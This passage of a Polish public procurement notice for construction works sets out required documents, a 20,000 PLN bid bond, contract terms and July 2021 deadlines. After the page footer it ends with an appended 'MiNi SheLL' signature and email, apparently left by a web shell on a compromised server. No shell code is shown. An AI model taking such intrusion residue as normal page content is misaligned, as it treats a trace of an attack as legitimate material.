zawarł wiążące porozumienie w sprawie spłat tych<br/>należności.<br/>4) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r.o ochronie<br/>konkurencji i konsumentów (Dz.U. Z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór<br/>oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa<br/>art. 108 ust. 1 pkt 5 Pzp stanowi Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez<br/>nieczynności oraz informacją o podstawie do dysponowania tymi osobami – zał. nr 3 do SWZ. (W<br/>przypadku wykazania osób udostępnionych Wykonawcy przez inne podmioty należy dołączyć do w/w<br/>załącznika pisemne zobowiązanie tych podmiotów do udostępnienia tych osób).<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane – zał. nr 4 do SWZ,<br/>oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. W przypadku gdy<br/>zamawiający jest podmiotem, na rzecz którego roboty budowlane, wskazane w wykazie robót, zostały<br/>wcześniej<br/>wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszym<br/>punkcie.<br/>3) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Formularz oferty wg. załączonego wzoru zał nr 1 do SWZ .<br/>2. Kosztorys ofertowy. <br/>3. oświadczenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postępowaniu – zał. nr 2 do SWZ.<br/>a) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku<br/>istnienia wobec nich podstaw wykluczenia oraz spełniania,<br/>w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza<br/>informacje o tych podmiotach w oświadczeniu, o którym mowa w ppkt 1,<br/>b) Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w<br/>celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w<br/>postępowaniu:zamieszcza informacje o<br/>podwykonawcach w oświadczeniu, o którym mowa w ppkt 1.<br/>4. Oświadczenie Wykonawcy w zakresie wypełnienia obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art. 14 RODO.<br/>5. Kopia dowodu wpłaty lub poręczeń bądź gwarancji zabezpieczenia wadium. 6. Wykonawca,<br/>który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu,<br/>że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w<br/>szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Składając ofertę Wykonawca zobowiązany jest wnieść wadium przetargowe na czas równy okresowi związania ofertą w wysokości: 20 000,00 PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa w zdaniu poprzednim, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany umowy na podstawie art. 455 ustawy PZP oraz zapisów<br/>istotnych postanowień umowy (zał. nr 7 do SWZ). Wszelkie zmiany i uzupełnienia treści umowy<br/>mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obydwie strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com